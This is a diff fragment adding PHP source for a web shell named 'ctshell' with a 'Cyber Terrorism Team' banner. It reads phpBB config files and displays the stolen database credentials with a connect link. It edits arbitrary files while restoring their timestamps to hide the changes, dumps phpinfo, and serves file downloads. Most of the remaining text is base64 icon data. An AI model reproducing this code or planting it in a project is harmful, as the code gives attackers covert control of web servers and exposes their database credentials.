+  elseif ($ft == "sdb")
+  {
+echo "<pre>";
+var_dump(unserialize(base64_decode($r)));
+echo "</pre>";
+  }
+  elseif ($ft == "code")
+  {
+if (ereg("phpBB 2.(.*) auto-generated config file",$r))
+{
+ $arr = explode("
+",$r);
+ if (count($arr == 18))
+ {
+  include($d.$f);
+  echo "<b>phpBB configuration is detected in this file!<br>";
+  if ($dbms == "mysql4") {$dbms = "mysql";}
+  if ($dbms == "mysql") {echo "<a href=\"".$sul."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+  else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ctshell";}
+  echo "Parameters for manual connect:<br>";
+  $cfgvars = array(
+  "dbms"=>$dbms,
+  "dbhost"=>$dbhost,
+  "dbname"=>$dbname,
+  "dbuser"=>$dbuser,
+  "dbpasswd"=>$dbpasswd 
+  );
+  foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+ 
+  echo "</b>";
+  echo "<hr size=\"1\" noshade>";
+ }
+}
+echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">";
+if (!empty($white)) {@ob_clean();}
+if ($rehtml) {$r = rehtmlspecialchars($r);} 
+$r = stripslashes($r); 
+$strip = false;
+if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;}
+$r = @highlight_string($r, TRUE); 
+if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);}
+echo $r;
+if (!empty($white)) {exit;}
+echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+@ob_clean();
+header("Content-type: ctshell");
+header("Content-disposition: attachment; filename=\"".$f."\";"); 
+echo($r); 
+exit;
+  }
+  elseif ($ft == "notepad")
+  {
+@ob_clean();
+header("Content-type: text/plain"); 
+header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+echo($r); 
+exit;
+  }
+  elseif ($ft == "img")
+  {
+if (!$white)
+{
+ echo "<center><img src=\"".$sul."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>";
+}
+else
+{
+ @ob_clean();
+ $ext = explode($f,".");
+ $ext = $ext[count($ext)-1];
+ header("Content-type: image/gif"); 
+ echo($r); 
+ exit;
+}
+  }
+  elseif ($ft == "edit")
+  {
+if (!empty($submit))
+{
+ if ($filestealth) {$stat = stat($d.$f);}
+ if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);}
+ $fp = fopen($d.$f,"w");
+ if (!$fp) {echo "<b>Can't write to file!</b>";}
+ else
+ {
+  echo "<b>Ñîõğàí¸íü!!!</b>";
+  fwrite($fp,$nfcontent);
+  fclose($fp);
+  if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+  $r = $nfcontent;
+ }
+}
+$rows = count(explode("
+",$r));
+if ($rows < 10) {$rows = 10;}
+if ($rows > 30) {$rows = 30;}
+echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Ñîõğàíèòü\">&nbsp;<input type=\"reset\" value=\"Ñáğîñ\">&nbsp;<br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+if ($act == "phpinfo")
+{
+ ob_end_clean();
+ phpinfo();
+ exit;
+}
+}
+$data = base64_decode("PGNlbnRlcj48Zm9udCBzaXplPTIgY29sb3I9IzAwZmYwMD5DeWJlciBUZXJyb3Jpc20gVGVhbTwvZm9udD48YnI+PGZvbnQgc2l6ZT0yPg0KyOTl/ywg6Ofs5e3l7ej/IOTo5+Dp7eAg6CDx6vDo7/LgIOTu4eDi6Os6PC9mb250PjxpbWcgc3JjPWh0dHA6Ly9vbmxpbmUubWlyYWJpbGlzLmNvbS9zY3JpcHRzL29ubGluZS5kbGw/aWNxPTMzNTk3NjAyMSZpbWc9NSBoZWlnaHQ9MTggd2lkdGg9MTg+PGZvbnQgc2l6ZT0yIGNvbG9yPSNGRkRFMDA+IFJPRE5PQzwvZm9udD48L2NlbnRlcj4=");
+if ($act == "img")
+{
+ @ob_clean();
+ 
+ $arrimg = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhEQAPAKIAAO/v8N3e387OzpSt72NzrVFZfCkxUv///yH5BAUUAAcALAAAAAARAA8AAANSe".
+"Grc3uoYAEq4wWZqFtWXVnBehWUhKQ1V4b6uagwsZd/ATO84ru+0k/C3MxCOSIyDZhQ4nYRnZ2UQRJ9".
+"W6aKaxV4F02r1CwWDF2bYyzyVPN6dBAA7",
+"edit"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhDgAQALMPAKt5E8uYM7SBHLyJJMaTLsGOKaRyDJ5sBv/MZ//////ge//rhf/Ub//3kf//m".
+"f///yH5BAEAAA8ALAAAAAAOABAAAARF8MlJq704axo6yUEiJsUVOqiTDIPgSkEjz6MIPMGi7/xyE4q".
+"gcKj4MY7IJONWQDifUAQzSr0NqFErFnp7uASAsMFwKD8iADs=",
+"small_unk"=>
+"R0lGODlhEQAUANUhAOXl1c3MzJiYmCkufnoRE83MzTNOoszLzO4jI/HqQIeGh5iYlxZ7PRh8PXLM".
+"2FRVVMvLyzRNofbHPnsRE+bm1QgJCebl1FRUVFVVVIaGh1VVVQcICCoufoaFhYWGhszMzP///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAACEALAAAAAARABQAAAaewJBw".
+"SCwaj0hPZpnxOD2dhdFDsVgBV4tAU+yAvmCwAHQhesNhwQVTFnoVS2gn0/FsIJiht8ORcP4DfxVk".
+"QxkgfIF/gBuEQh6HaF8WjHmOIIYJBF8GIBSUQ49eBAggBg4RniBclo8gE18MDQCDqyGhAFUUuLi0".
+"oCAbFRvAwcCMtWeRYW0hGQcfAc/QBQEFzpUhbBoaGNsP2mtrSOLjSEEAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_ani"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP/////MmczMmf/MzJmZZszMzP//zAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARbEMmJAKC4XhCKvRhABJZgACY4oSR3HmdFcQLndaVK7ziu".
+"VQRBYBAI1IKWYrLIJBhwrBqzOHKCotMRcaCbBrRDz+pLHQ65IWOZKE4Lz+hM5SAcDNoZwOBAINxV".
+"EQA7",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_au"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_bat"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_bin"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_bmp"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_cat"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".
+"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".
+"fRQRADs=",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cnf"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgAAA/wD//wAAAANK".
+"CLqs9weESSuAMZQSiPfBBUlVIJyo8EhbJ5TTRVJvM8gaR9TGRtyZSm1T+OFau87HGKQNnlBgA5Cq".
+"Yh4vWOz6ikZFoynjSi6byQkAOw==",
+"ext_com"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_cov"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAEUxDJKY+9Fr3ND/JV9lASAHCV9mHPybXay7kb4LUmILWziOiPwaB1IH5i".
+"uMVCaLGBRhOT0pQBri6mQEL3Q8py0ZwYTLE5b6Aw9lw+Y6glN2Ytt0QAADs=",
+"ext_cpc"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".
+"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",
+"ext_cpl"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
